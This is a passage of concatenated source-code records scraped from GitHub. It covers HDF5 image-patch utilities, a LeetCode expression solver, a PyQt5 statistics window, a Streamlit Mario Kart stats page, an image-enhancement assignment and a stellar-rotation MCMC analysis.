hdf5.\n Assumes initialize_hdf5_bag_3D has been run before\n \"\"\"\n x = patch['x']\n y = patch['y']\n z = patch['z']\n\n name = patch['name']\n img_patch = patch['patch']\n save_path = patch['save_path']\n\n # img_patch: list of (w, h)\n img_patch = img_patch[np.newaxis, ...] # (z, w, h) -> (-1, z, w, h)\n img_shape = img_patch.shape # (-1, z, w, h)\n\n file_path = os.path.join(save_path, name) + '_patches.h5'\n file = h5py.File(file_path, \"a\")\n\n dset = file['imgs']\n dset.resize(len(dset) + img_shape[0], axis=0)\n dset[-img_shape[0]:] = img_patch\n\n coord_dset = file['coords']\n coord_dset.resize(len(coord_dset) + img_shape[0], axis=0)\n coord_dset[-img_shape[0]:] = (z, x, y)\n\n file.close()\n\n\ndef initialize_hdf5_bag_3D(patch, z_level_start):\n \"\"\"\n Initialize hdf5. Contains three datasets - imgs, coords, z_level\n\n imgs: holder for patches (numOfpatches, z , w, h)\n coords: Holder for top-left corner of each patch (Tuple of three element)\n z_level: indicates the z-level of the corresponding patch\n \"\"\"\n x = patch['x']\n y = patch['y']\n z = patch['z']\n\n name = patch['name']\n patch_level = patch['patch_level']\n downsample = patch['downsample']\n downsampled_level_dim = patch['downsampled_level_dim']\n level_dim = patch['level_dim']\n img_patch = patch['patch']\n save_path = patch['save_path']\n resolution = patch['resolution']\n\n file_path = os.path.join(save_path, name) + '_patches.h5'\n file = h5py.File(file_path, \"w\")\n\n # img_patch: list of (w, h)\n img_patch = img_patch[np.newaxis, ...] # (z, w, h) -> (-1, z, w, h)\n\n dtype = img_patch.dtype\n\n # Initialize a resizable dataset to hold the output\n img_shape = img_patch.shape # (-1, z, w, h)\n\n # maximum dimensions up to which dataset maybe resized (None means unlimited)\n # First dim: number of patches in each slice\n maxshape = (None,) + img_shape[1:]\n dset = file.create_dataset('imgs',\n shape=img_shape,\n maxshape=maxshape,\n dtype=dtype)\n\n dset[:] = img_patch\n\n # Attributes\n dset.attrs['patch_level'] = patch_level\n dset.attrs['wsi_name'] = name\n dset.attrs['downsample'] = downsample\n dset.attrs['level_dim'] = level_dim\n dset.attrs['downsampled_level_dim'] = downsampled_level_dim\n dset.attrs['resolution'] = resolution\n\n coord_dset = file.create_dataset('coords',\n shape=(1, 3),\n maxshape=(None, 3),\n dtype=np.int32)\n\n coord_dset[:] = (z, x, y)\n coord_dset.attrs['z_level_start'] = z_level_start\n\n file.close()\n\n\n###########################\n# H&E preprocessing utils #\n###########################\ndef savePatchIter_bag_hdf5(patch):\n \"\"\"\n Save patch iteratively to hdf5\n \"\"\"\n x, y, cont_idx, patch_level, downsample, downsampled_level_dim, level_dim, img_patch, name, save_path = tuple(\n patch.values())\n img_patch = np.array(img_patch)[np.newaxis, ...]\n img_shape = img_patch.shape\n\n file_path = os.path.join(save_path, name) + '.h5'\n file = h5py.File(file_path, \"a\")\n\n dset = file['imgs']\n dset.resize(len(dset) + img_shape[0], axis=0)\n dset[-img_shape[0]:] = img_patch\n\n if 'coords' in file:\n coord_dset = file['coords']\n coord_dset.resize(len(coord_dset) + img_shape[0], axis=0)\n coord_dset[-img_shape[0]:] = (x, y)\n\n file.close()\n\n\ndef initialize_hdf5_bag(first_patch, save_coord=False):\n x, y, cont_idx, patch_level, downsample, downsampled_level_dim, level_dim, img_patch, name, save_path = tuple(\n first_patch.values())\n file_path = os.path.join(save_path, name) + '.h5'\n file = h5py.File(file_path, \"w\")\n img_patch = np.array(img_patch)[np.newaxis, ...]\n dtype = img_patch.dtype\n\n # Initialize a resizable dataset to hold the output\n img_shape = img_patch.shape\n maxshape = (None,) + img_shape[1:] # maximum dimensions up to which dataset maybe resized (None means unlimited)\n dset = file.create_dataset('imgs',\n shape=img_shape, maxshape=maxshape, chunks=img_shape, dtype=dtype)\n\n dset[:] = img_patch\n dset.attrs['patch_level'] = patch_level\n dset.attrs['wsi_name'] = name\n dset.attrs['downsample'] = downsample\n dset.attrs['level_dim'] = level_dim\n dset.attrs['downsampled_level_dim'] = downsampled_level_dim\n\n if save_coord:\n coord_dset = file.create_dataset('coords', shape=(1, 2), maxshape=(None, 2), chunks=(1, 2), dtype=np.int32)\n coord_dset[:] = (x, y)\n\n file.close()\n return file_path\n\n\ndef screen_coords(scores, coords, top_left, bot_right):\n \"\"\"\n Filter coordinates/scores within the bounding box\n \"\"\"\n bot_right = np.array(bot_right)\n top_left = np.array(top_left)\n mask = np.logical_and(np.all(coords >= top_left, axis=1), np.all(coords <= bot_right, axis=1))\n scores = scores[mask]\n coords = coords[mask]\n return scores, coords\n\n\ndef to_percentiles(scores):\n from scipy.stats import rankdata\n scores = rankdata(scores, 'average')/len(scores) * 100\n return scores\n\n\ndef initialize_df(slides, seg_params, filter_params, vis_params, patch_params, img_params):\n \"\"\"\n Initialize dataframe with relevant parameters\n \"\"\"\n total = len(slides)\n df = pd.DataFrame({'slide_id': slides, 'process': np.full((total), 1, dtype=np.uint8),\n 'status': np.full((total), 'tbp'),\n\n ## seg params\n # Level at which to segment (Not yet used for 3D)\n 'seg_level': np.full((total), int(seg_params['seg_level']), dtype=np.int8),\n # Threshold for binarization\n 'sthresh': np.full((total), int(seg_params['sthresh']), dtype=np.uint8),\n # Median filtering raidus (Too low of a value will result in squiggly contours)\n 'mthresh': np.full((total), int(seg_params['mthresh']), dtype=np.uint8),\n 'close': np.full((total), int(seg_params['close']), dtype=np.uint32),\n 'use_otsu': np.full((total), bool(seg_params['use_otsu']), dtype=bool),\n\n ## filter params\n # threshold for area of tissue (multiplier - will be multiplied by reference patch size)\n 'a_t': np.full((total), int(filter_params['a_t']), dtype=np.uint32),\n # threshold for area of hole (multiplier - will be multiplied by reference patch size)\n 'a_h': np.full((total), int(filter_params['a_h']), dtype=np.uint32),\n # maximum number of holes\n 'max_n_holes': np.full((total), int(filter_params['max_n_holes']), dtype=np.uint32),\n\n # vis params\n 'vis_level': np.full((total), int(vis_params['vis_level']), dtype=np.int8), # Not used\n 'line_thickness': np.full((total), int(vis_params['line_thickness']), dtype=np.uint32),\n\n # patching params\n 'use_padding': np.full((total), bool(patch_params['use_padding']), dtype=bool),\n 'contour_fn': np.full((total), patch_params['contour_fn']),\n\n # img_params\n 'black_thresh': np.full((total), img_params['black_thresh'], dtype=np.float32),\n 'clip_min': np.full((total), img_params['clip_min'], dtype=np.uint32),\n 'clip_max': np.full((total), img_params['clip_max'], dtype=np.uint32)\n })\n\n return df\n\n# def get_best_HE_patch_level(wsi, ref_res):\n# \"\"\"\n# Given the resolution for the reference modality (i.e., CT), find the best level to process WSI\n#\n# Inputs\n# ======\n# wsi: OpenSlide object\n# ref_res: float\n# Resolution for the reference modality\n# \"\"\"\n# factor = ref_res / float(wsi.properties['openslide.mpp-x'])\n# patch_level = wsi.get_best_level_for_downsample(factor)\n#\n# return patch_level\n","repo_name":"mahmoodlab/mamba","sub_path":"preprocess/wsi_core/wsi_utils.py","file_name":"wsi_utils.py","file_ext":"py","file_size_in_byte":8067,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"47"} +{"seq_id":"16158782671","text":"def diffWaysToCompute(self, expression: str) -> List[int]:\n\n res = []\n for i in range(len(expression)):\n c = expression[i]\n if c in \"+-*\":\n left = self.diffWaysToCompute(expression[:i])\n right = self.diffWaysToCompute(expression[i + 1:])\n\n for l in left:\n for r in right:\n if c == \"+\":\n res.append(l + r)\n if c == \"*\":\n res.append(l * r)\n if c == \"-\":\n res.append(l - r)\n \n if len(res) == 0:\n res.append(int(expression))\n \n return res","repo_name":"snail15/AlgorithmPractice","sub_path":"LeetCode/Python/SecondRound/241_differentWaysToAddParentheses.py","file_name":"241_differentWaysToAddParentheses.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42712867494","text":"from PyQt5.QtWidgets import *\nfrom GUI.BaseComponents.SymbolList import SymbolList\nfrom GUI.BaseComponents.TimeframeList import TimeframeList\nfrom GUI.BacktestWindow.BacktestWindow import getAllSubClassesOfAbstractClass\nfrom Statistics.Statistics import Statistics\nimport os\nimport inspect\nimport importlib\nfrom collections import OrderedDict\nfrom Statistics.Main_Statistics import load_data\nfrom GUI.StatisticsWindow.VariableList import VariableList\nimport Constants\n\n\nclass StatisticsWindow(QWidget):\n def __init__(self):\n super().__init__()\n\n self.layout = QVBoxLayout()\n\n self.strategyLayout = QHBoxLayout()\n self.strategyComboBox = QComboBox()\n\n self.universeLayout = QHBoxLayout()\n self.symbolList = SymbolList()\n self.timeframeList = TimeframeList()\n\n self.dateLayout = QHBoxLayout()\n self.startDateField = QDateEdit()\n self.endDateField = QDateEdit()\n\n self.statisticsLayout = QHBoxLayout()\n self.statisticsComboBox = QComboBox()\n self.statisticsParameters = []\n\n self.controleLayout = QHBoxLayout()\n self.saveNameField = QLineEdit()\n self.saveButton = QPushButton()\n\n self.initLayout()\n\n def initLayout(self):\n self.initStrategyLayout()\n self.initUniverseLayout()\n self.initDateLayout()\n self.initStatisticsLayout()\n self.initControleLayout()\n\n self.layout.addLayout(self.strategyLayout)\n self.layout.addLayout(self.universeLayout)\n self.layout.addLayout(self.dateLayout)\n self.layout.addLayout(self.statisticsLayout)\n self.layout.addLayout(self.controleLayout)\n\n self.setLayout(self.layout)\n\n def initStrategyLayout(self):\n self.strategyComboBox.setToolTip(\"Strategy\")\n folders = [f for f in os.listdir(Constants.STATISTICS_DIRECTORY[:-1]) if os.path.isdir(Constants.STATISTICS_DIRECTORY + f)]\n self.strategyComboBox.addItems(folders)\n self.strategyComboBox.currentTextChanged.connect(self.strategyChanged)\n\n self.strategyLayout.addWidget(self.strategyComboBox)\n\n def initDateLayout(self):\n self.startDateField.setDisplayFormat(\"yyyy-MM-dd\")\n self.endDateField.setDisplayFormat(\"yyyy-MM-dd\")\n\n self.startDateField.setToolTip(\"StartDate\")\n self.endDateField.setToolTip(\"EndDate\")\n\n self.dateLayout.addWidget(self.startDateField)\n self.dateLayout.addWidget(self.endDateField)\n\n def initUniverseLayout(self):\n self.universeLayout.addWidget(self.symbolList)\n self.universeLayout.addWidget(self.timeframeList)\n\n def initStatisticsLayout(self):\n self.statisticsComboBox.setToolTip(\"Statistics\")\n self.statisticsComboBox.addItems(getAllSubClassesOfAbstractClass(\"Statistics\", Statistics))\n self.statisticsComboBox.currentTextChanged.connect(self.statisticChanged)\n\n self.statisticsLayout.addWidget(self.statisticsComboBox)\n\n def statisticChanged(self):\n module = importlib.import_module(\"Statistics.\" + self.statisticsComboBox.currentText())\n parameters = OrderedDict\n for name, obj in inspect.getmembers(module):\n if name == self.statisticsComboBox.currentText():\n parameters = inspect.signature(obj).parameters\n\n for widget in self.statisticsParameters:\n self.statisticsLayout.removeWidget(widget)\n self.statisticsParameters = []\n\n for param, value in parameters.items():\n if param == \"df\":\n continue\n elif param == \"variable_list\":\n widget = VariableList(Constants.STATISTICS_DIRECTORY + self.strategyComboBox.currentText() + \"\\\\\" +\n self.symbolList.data[0] + \"\\\\Trades.csv\")\n else:\n widget = QLineEdit()\n widget.setToolTip(param)\n if value.default is not inspect.Parameter.empty and value.default is not None:\n widget.setText(str(value.default))\n self.statisticsParameters.append(widget)\n self.statisticsLayout.addWidget(widget)\n\n def initControleLayout(self):\n self.saveNameField.setToolTip(\"SaveName\")\n self.saveButton.setText(\"Save\")\n self.saveButton.clicked.connect(self.save)\n\n self.controleLayout.addWidget(self.saveNameField)\n self.controleLayout.addWidget(self.saveButton)\n\n def save(self):\n # Add start, end date to load data\n # Get indicator list\n for symbol in self.symbolList.getSelectedRows():\n for timeframe in self.timeframeList.getSelectedRows():\n params = (load_data(self.strategyComboBox.currentText(), symbol, timeframe, []),)\n for widget in self.statisticsParameters:\n if isinstance(widget, QLineEdit):\n params = params + (widget.text(),)\n elif isinstance(widget, VariableList):\n variableList = [[a, b] for a, b in zip(widget.getSelectedRows(1, 0), widget.getSelectedRows(1, 2))]\n params = params + (variableList,)\n else:\n print(\"Data of \" + str(type(widget)) + \" can not be read\")\n\n mymodule = importlib.import_module(\"Statistics.\" + self.statisticsComboBox.currentText())\n classObject = getattr(mymodule, self.statisticsComboBox.currentText())\n\n instance = classObject(*params)\n\n instance.plot_results(self.saveNameField.text())\n\n def strategyChanged(self):\n self.universeLayout.removeWidget(self.symbolList)\n self.universeLayout.removeWidget(self.timeframeList)\n\n symbols = [f for f in os.listdir(Constants.STATISTICS_DIRECTORY + self.strategyComboBox.currentText()) if\n os.path.isdir(Constants.STATISTICS_DIRECTORY + self.strategyComboBox.currentText() + \"\\\\\" + f)]\n self.symbolList = SymbolList(symbols)\n\n self.universeLayout.addWidget(self.symbolList)\n self.universeLayout.addWidget(self.timeframeList)\n","repo_name":"Potti1234/ED_Backtester","sub_path":"GUI/StatisticsWindow/StatisticsWindow.py","file_name":"StatisticsWindow.py","file_ext":"py","file_size_in_byte":6112,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"14664194525","text":"import streamlit as st\nimport pandas as pd\n\n\n\nst.markdown(\"# Racer Page 🎈\")\nst.sidebar.markdown(\"# This is Racer Page 🎈\")\nst.write(' # Mariokart *Stats Website*')\n\nlink = \"\"\"Back to BI Site \"\"\"\nst.markdown(link, unsafe_allow_html=True)\n\ndf_racer = pd.read_csv('data/racer_stats.csv')\nst.write(df_racer)\nst.dataframe(df_racer.style\n.highlight_max(color='lightgreen', axis=0,subset=['Speed','Acceleration','Weight'])\n.highlight_min(color='red', axis=0,subset=['Speed','Acceleration','Weight'] )\n)\nst.line_chart(df_racer,x='Speed',y=['Acceleration','Weight','Handling','Traction/Grip','Mini-Turbo'])\n\nst.header(\"Racer Speed doesn't seem to correlate to number of races they win\")\nx = st.slider('How Many Racers to Show',1,len(df_racer))\nst.write(\"Racers by Speed\")\ndf_fastest_Racers = df_racer[['Character','Speed']].sort_values(\"Speed\",ascending=False).iloc[0:x]\nst.dataframe(df_fastest_Racers)\ncharacter_dictionary = {'Mario' : 'Crowd favorite', 'Luigi' : 'Just a Green Mario'}\n\n\nleft_column_1, right_column_1 = st.columns(2)\nwith left_column_1:\n st.write(\"Racers by Speed\")\n df_fastest_Racers = df_racer[['Character','Speed']].sort_values(\"Speed\",ascending=False).iloc[0:x]\n st.dataframe(df_fastest_Racers)\nwith right_column_1:\n # Bring in Variable Table for percent won\n st.write(\"Racers by Win Percent\")\n df_best = df_racer[['Character','Times First Place','Total Races']]\n df_best['Win Percent'] = df_best['Times First Place'] / df_best['Total Races'] * 100\n df_best = df_best[['Character', 'Win Percent']].sort_values('Win Percent',ascending=False).iloc[0:x]\n st.dataframe(df_best)\n\nst.header(\"Individual Racer Stats\")\n\nleft_column_2, right_column_2 = st.columns(2)\n\nchosen = st.selectbox('Pick a Character', df_racer['Character'])","repo_name":"tylerbarty/TylersWebsite","sub_path":"racer_stats.py","file_name":"racer_stats.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19238555659","text":"#!/usr/bin/env python\n\n'''\nImage Processing course assignment 1.\n\nUniversity of São Paulo (USP)\nInstitute of Mathematics and Computing Sciences (ICMC)\nSCC0251 - Image Processing 2023.1\nAssignment 1: enhancement and super-resolution\nLucas Xavier Leite, USP number: 10783347\n\nTask\n----\nIn this assignment you have to implement 3 distinct image enhancement\ntechniques, as well as a super-resolution method based on multiple views of the\nsame image.\n'''\n\nimport glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport imageio.v3 as iio\n\nDEBUG = False\nGRAY_LEVELS = 256\n\n\ndef main():\n filename = input()\n ref_image = input()\n option = int(input())\n gamma = float(input())\n\n images = np.array([iio.imread(file)\n for file in sorted(glob.glob(f'{filename}*.png'))])\n\n if option == 1:\n images = single_histogram_equalization(images)\n elif option == 2:\n images = joint_histogram_equalization(images)\n elif option == 3:\n images = gamma_correction(images, gamma)\n\n H_hat = super_resolution(images)\n H_ref = iio.imread(ref_image)\n\n print(f'{round(rmse(H_ref, H_hat), 4):.4f}')\n\n\ndef histogram(image, levels):\n '''\n Compute an image histogram.\n\n Parameters\n ----------\n image : array-like\n The image from which to obtain the histogram.\n levels : int\n Number of gray levels to consider when counting frequencies.\n\n Returns\n -------\n numpy.ndarray\n The histogram of ``image``.\n '''\n h = np.zeros(levels).astype(int)\n\n for i in range(levels):\n h[i] = np.sum(image == i)\n\n return h\n\n\ndef cumulative_histogram(image, levels):\n '''\n Compute a cumulative image histogram.\n\n Parameters\n ----------\n image : array-like\n The image from which to obtain the cumulative histogram.\n levels : int\n Number of gray levels to consider when counting frequencies.\n\n Returns\n -------\n numpy.ndarray\n The cumulative histogram of ``image``.\n '''\n h = histogram(image, levels)\n\n hc = np.zeros(levels).astype(int)\n hc[0] = h[0]\n\n for i in range(1, levels):\n hc[i] = h[i] + hc[i-1]\n\n return hc\n\n\ndef joint_cumulative_histogram(images, levels):\n '''\n Compute a joint cumulative image histogram using the images mean values.\n\n Parameters\n ----------\n images : array-like\n The images from which to obtain the joint cumulative histogram.\n levels : int\n Number of gray levels to consider when counting frequencies.\n\n Returns\n -------\n numpy.ndarray\n The joint cumulative histogram of ``images``.\n '''\n jh = np.mean([histogram(img, levels) for img in images], axis=0)\n\n if DEBUG is True:\n print([histogram(i, levels) for i in images])\n print(jh)\n\n jhc = np.zeros(levels).astype(int)\n jhc[0] = jh[0]\n\n for i in range(1, levels):\n jhc[i] = jh[i] + jhc[i-1]\n\n return jhc\n\n\ndef histogram_equalization(image, levels, cumulative_histogram):\n '''\n Equalize an image histogram.\n\n Parameters\n ----------\n image : array-like\n The image whose histogram to equalize.\n levels : int\n Number of gray levels to consider when counting frequencies.\n cumulative_histogram : array-like\n Cumulative histogram of ``image``.\n\n Returns\n -------\n s : numpy.ndarray\n The equalized histogram of ``image``.\n T : numpy.ndarray\n The transformation applied.\n '''\n s = np.zeros(image.shape).astype(np.uint8)\n T = np.zeros(levels).astype(np.uint8)\n\n N, M = image.shape\n\n for z in range(levels):\n si = ((levels - 1) / float(M * N)) * cumulative_histogram[z]\n s[np.where(image == z)] = si\n T[z] = si\n\n return (s, T)\n\n\ndef single_histogram_equalization(images):\n '''\n Perform histogram equalization on a set of images.\n\n Parameters\n ----------\n images : array-like\n The images to be enhanced using histogram equalization.\n\n Returns\n -------\n numpy.ndarray\n The enhanced images.\n '''\n if DEBUG is True:\n fig, ax = plt.subplots(images.shape[0], 5, figsize=(3, 3))\n\n images_eq = np.zeros(images.shape)\n\n for i, img in enumerate(images):\n hc = cumulative_histogram(img, GRAY_LEVELS)\n img_eq, T = histogram_equalization(img, GRAY_LEVELS, hc)\n images_eq[i] = img_eq\n\n if DEBUG is True:\n print(f'\\n{i}:\\n')\n print(img_eq)\n print_debug(ax, i, img, img_eq, T)\n\n if DEBUG is True:\n plt.show()\n\n return images_eq\n\n\ndef joint_histogram_equalization(images):\n '''\n Perform histogram equalization on a set of images, using a joint histogram.\n\n The same joint cumulative histogram is used to equalize the whole set of\n image histograms, instead of using each image's own histogram.\n\n Parameters\n ----------\n images : array-like\n The images to be enhanced.\n\n Returns\n -------\n numpy.ndarray\n The enhanced images.\n '''\n if DEBUG is True:\n fig, ax = plt.subplots(images.shape[0], 5, figsize=(3, 3))\n\n jhc = joint_cumulative_histogram(images, GRAY_LEVELS)\n\n images_eq = np.zeros(images.shape)\n\n for i, img in enumerate(images):\n img_eq, T = histogram_equalization(img, GRAY_LEVELS, jhc)\n images_eq[i] = img_eq\n\n if DEBUG is True:\n print(f'\\n{i}:\\n')\n print(img_eq)\n print_debug(ax, i, img, img_eq, T)\n\n if DEBUG is True:\n plt.show()\n\n return images_eq\n\n\ndef gamma_correction_single(image, gamma):\n '''\n Perform gamma correction on a single image.\n\n Parameters\n ----------\n image : array-like\n The image to be enhanced.\n gamma : float\n The gamma correction factor.\n\n Returns\n -------\n numpy.ndarray\n The enhanced image.\n '''\n output = image.copy()\n max_value = float(GRAY_LEVELS - 1)\n\n for x in range(output.shape[0]):\n for y in range(output.shape[1]):\n output[x][y] = (max_value * ((output[x][y] / max_value)\n ** (1 / gamma))).astype(np.uint8)\n\n return output\n\n\ndef gamma_correction(images, gamma):\n '''\n Perform gamma correction on a set of images.\n\n Parameters\n ----------\n images : array-like\n The images to be enhanced.\n gamma : float\n The gamma correction factor.\n\n Returns\n -------\n numpy.ndarray\n The enhanced image.\n '''\n if DEBUG is True:\n fig, ax = plt.subplots(images.shape[0], 4, figsize=(3, 3))\n\n G = np.array([gamma_correction_single(img, gamma) for img in images])\n\n if DEBUG is True:\n for i, (img, gi) in enumerate(zip(images, G)):\n print(f'\\nOriginal ({i}):\\n')\n print(img)\n print(f'\\nEqualized ({i}):\\n')\n print(gi)\n print_debug(ax, i, img, gi)\n\n plt.show()\n\n return G\n\n\ndef super_resolution(images):\n '''\n Use a set of low resolution images to compose one of higher resolution.\n\n Parameters\n ----------\n images : array-like\n The set of low resolution images.\n\n Returns\n -------\n numpy.ndarray\n The higher resolution image.\n '''\n assert images.shape[0] == 4\n\n N, M = images[0].shape\n\n H = np.zeros((N * 2, M * 2))\n\n H[::2, ::2] = images[0]\n H[::2, 1::2] = images[1]\n H[1::2, ::2] = images[2]\n H[1::2, 1::2] = images[3]\n\n if DEBUG is True:\n print(f'{images[0].shape} -> {H.shape}\\n')\n print('L[0]:\\n')\n print(images[0])\n\n print('\\nL[1]:\\n')\n print(images[1])\n\n print('\\nL[2]:\\n')\n print(images[2])\n\n print('\\nL[3]:\\n')\n print(images[3])\n\n print('\\nH:\\n')\n print(H)\n\n plt.imshow(images[0], cmap='gray')\n plt.axis('off')\n plt.show()\n\n plt.imshow(H, cmap='gray')\n plt.axis('off')\n plt.show()\n\n return H\n\n\ndef rmse(reference, image):\n '''\n Calculate the root mean squared error of two images.\n\n Parameters\n ----------\n reference : array-like\n The reference image.\n image : array-like\n The image to compare against the reference image.\n\n Returns\n -------\n float\n The root mean squared error.\n '''\n return np.sqrt(np.square(reference - image).mean())\n\n\ndef print_debug(ax, row, original_image, enhanced_image, transformation=None):\n '''\n Print info and plot graphs for debugging.\n\n This function considers a fixed number of columns (3 or 4) for plotting,\n and plots all graphs in a single row, i.e., this function should be called\n once for each row. After calling this function for the last row,\n matplotlib.pyplot.show should be called.\n\n The plots include both the original input image and the enhanced image, as\n well as their histograms and the transformation function - when using the\n `transformation` optional parameter.\n\n Parameters\n ----------\n ax : array-like\n 2D array of `matplotlib.axes.Axes` used for plotting. The number of\n columns may only be 3 or 4 (to include the plot of `transformation`).\n row : int\n Subplot row number.\n original_image : array-like\n The original input image, without any enhancement.\n enhanced_image : array-like\n The enhanced image.\n transformation : array-like\n The transformation function applied to the image.\n '''\n h = histogram(original_image, GRAY_LEVELS)\n heq = histogram(enhanced_image, GRAY_LEVELS)\n\n ax[row][0].imshow(original_image, cmap='gray')\n ax[row][0].axis('off')\n\n ax[row][1].bar(range(GRAY_LEVELS), h)\n ax[row][1].set_xlabel('Graylevel / intensity')\n ax[row][1].set_ylabel('Frequency')\n\n ax[row][2].imshow(enhanced_image, cmap='gray')\n ax[row][2].axis('off')\n\n ax[row][3].bar(range(GRAY_LEVELS), heq)\n ax[row][3].set_xlabel('Graylevel / intensity')\n ax[row][3].set_ylabel('Frequency')\n\n if transformation is not None:\n ax[row][4].plot(range(GRAY_LEVELS), transformation)\n ax[row][4].set_xlabel('Input pixel value')\n ax[row][4].set_ylabel('Output pixel value')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lucasxavierleite/dip","sub_path":"Assignment 1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"969711268","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport paths\nimport numpy as np\nimport pandas as pd\n\nfrom astropy.table import Table\nimport emcee\nimport corner\nfrom scipy.optimize import curve_fit\nfrom multiprocessing import Pool\n\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\nmpl.rcParams[\"figure.dpi\"] = 100\nmpl.rcParams[\"savefig.bbox\"] = \"tight\"\nmpl.rcParams[\"savefig.dpi\"] = 300\n\nimport seaborn as sns\n\nsns.set(\n context=\"paper\",\n style=\"ticks\",\n font_scale=1.2,\n palette=\"colorblind\"\n )\n\n\n######################################################################################\n#McQuillan et al. 2013\nmcq_koi = Table.read(\"https://cdsarc.cds.unistra.fr/ftp/J/ApJ/775/L11/table1.dat\",\n readme=\"https://cdsarc.cds.unistra.fr/ftp/J/ApJ/775/L11/ReadMe\",\n format=\"ascii.cds\")\nmcq_koi = mcq_koi.to_pandas()\nmcq_koi = mcq_koi.add_prefix('mcq_')\n\n\n#McQuillan et al. 2014\nmcq = pd.read_parquet(paths.data / 'mcquillan2014_table1.parquet')\n######################################################################################\n\n\n######################################################################################\n# California-Kepler Survey (Fulton & Petigura 2018)\n# This data table has been augmented with data from other surveys (see David et al. 2021)\ncks = pd.read_parquet(paths.data / 'cks_merged.parquet')\n# The dataframe has a row entry for each KOI, meaning individual star are represented N times\n# where N is the number of KOIs detected around that star so we drop duplicates.\ncks = cks.drop_duplicates(subset=['kepid'], keep='first')\ncks = cks.merge(mcq_koi, how='left', left_on='kepid', right_on='mcq_KIC')\n######################################################################################\n\n\n######################################################################################\n# LAMOST-Kepler \nlam = pd.read_parquet(paths.data / 'kepler_lamost.parquet')\n\n# Drop duplicate sources, keeping the one with the brighter G magnitude\nlam = lam.sort_values([\"KIC\", \"Gmag\"], ascending = (True, True))\nlam = lam.merge(mcq, how='left', left_on=\"KIC\", right_on=\"mcq_KIC\")\nlam = lam.drop_duplicates(subset=['KIC'], keep='first')\n\nlam_mask = (lam[\"Teff_lam\"]>3000)\nlam_mask = (lam[\"Teff_lam\"]<8000)\nlam_mask &= (lam[\"logg_lam\"]>4)\nlam_mask &= (lam[\"logg_lam\"]<5)\nlam_mask &= (abs(lam[\"feh_lam\"])<2)\nlam = lam[lam_mask]\n######################################################################################\n\n\n######################################################################################\ndef convective_turnover_timescale(teff): \n #Returns convective turnover timescale in days \n #Gunn et al. 1998 relation, from Cranmer & Saar 2011\n return 314.24*np.exp( -(teff/1952.5) - (teff/6250.)**18. ) + 0.002\n \ndef constant_rossby(teff, ro):\n #Return locus of rotation periods corresponding to constant Rossby number\n return ro * convective_turnover_timescale(teff)\n\nlam[\"Ro\"] = lam[\"Prot\"]/convective_turnover_timescale(lam[\"Teff_lam\"]) \n######################################################################################\n\n \ndef percentile_bootstrap(nsamples=100, \n f=0.5, \n pctl=90.):\n\n # nsamples : number of bootstrap resamplings to perform\n # f : fraction of data to leave out in each bin\n # pctl : percentile to compute\n \n _teff = np.linspace(4000,7500,1000)\n teff_bin_centers = np.arange(4000,7020,20)\n \n per_pctl = np.zeros(len(teff_bin_centers))\n per_pctl_err = np.zeros(len(teff_bin_centers))\n \n for i, tc in enumerate(teff_bin_centers):\n arg = (abs(lam[\"Teff_lam\"]-tc)<100) & (lam[\"Ro\"]<5/3)\n pctl_arr = []\n \n for n in range(nsamples):\n _x = np.array(lam[\"Prot\"][arg])\n pctl_arr.append(np.nanpercentile(_x[np.random.choice(len(_x), int(f*len(_x)), replace=True)], pctl))\n \n per_pctl[i] = np.mean(pctl_arr)\n per_pctl_err[i] = np.std(pctl_arr) \n \n \n return teff_bin_centers, per_pctl, per_pctl_err\n \nteff_bin_centers, period_90th_pctl, e_period_90th_pctl = percentile_bootstrap(pctl=90.)\nteff_bin_centers, period_10th_pctl, e_period_10th_pctl = percentile_bootstrap(pctl=10.) \n\n\n############################################\ncks_teff = cks[\"p20_cks_steff\"]\ncks_e_teff = cks[\"p20_cks_steff_err1\"]\ncks_prot = cks[\"d21_prot\"]\n\ndef ridge_hi(teff):\n m = (2-24)/(6500-5800)\n b = (2 - m*6500) \n return m*teff + b\n\ndef ridge_lo(teff):\n m = (2-24)/(6500-5800)\n b = (-5 - m*6500) \n return m*teff + b\n\nmask = (cks['p20_cks_slogg']>4) #main sequence\nridge = (cks['p20_cks_steff']>5850)\nridge &= (cks['p20_cks_steff']<6500)\nridge &= (cks['d21_prot']ridge_lo(cks['p20_cks_steff']))\nridge &= mask\n############################################\n\n\nlam_teff = lam[\"Teff_lam\"]\nlam_e_teff = lam[\"e_Teff_lam\"]\nlam_prot = lam[\"Prot\"]\n\nhall = Table.read(\"https://cdsarc.cds.unistra.fr/ftp/J/other/NatAs/5.707/table1.dat\",\n readme=\"https://cdsarc.cds.unistra.fr/ftp/J/other/NatAs/5.707/ReadMe\",\n format=\"ascii.cds\")\n\nx_lam = np.ascontiguousarray(teff_bin_centers, dtype=np.float64)\ny_lam = np.ascontiguousarray(period_90th_pctl, dtype=np.float64)\n\nx_cks = np.ascontiguousarray(cks_teff[ridge], dtype=np.float64)\ny_cks = np.ascontiguousarray(cks_prot[ridge], dtype=np.float64)\n\nhall_ms = (hall[\"Type\"] == \"MS\") #& (hall[\"Teff\"]>5800)\nx_hal = np.ascontiguousarray(hall[\"Teff\"][hall_ms], dtype=np.float64) \ny_hal = np.ascontiguousarray(hall[\"P\"][hall_ms], dtype=np.float64)\n\n\ndef constant_rossby_sampler(x, y, yerr,\n teff_min=5000, \n teff_max=6250,\n ndraws=5000, \n trace_plot=True,\n corner_plot=True):\n \n m = (np.isfinite(x)) & (np.isfinite(y)) & (x>teff_min) & (x5800) & (x1<6250)\nx1 = x1[arg1]\ny1 = y1[arg1]\ny1err = y1err[arg1]\n\n\nflat_samples_90 = constant_rossby_sampler(x = x1,\n y = y1,\n yerr = y1err,\n teff_min = 5000,\n teff_max = 6250)\n\nflat_samples_10 = constant_rossby_sampler(x = teff_bin_centers,\n y = 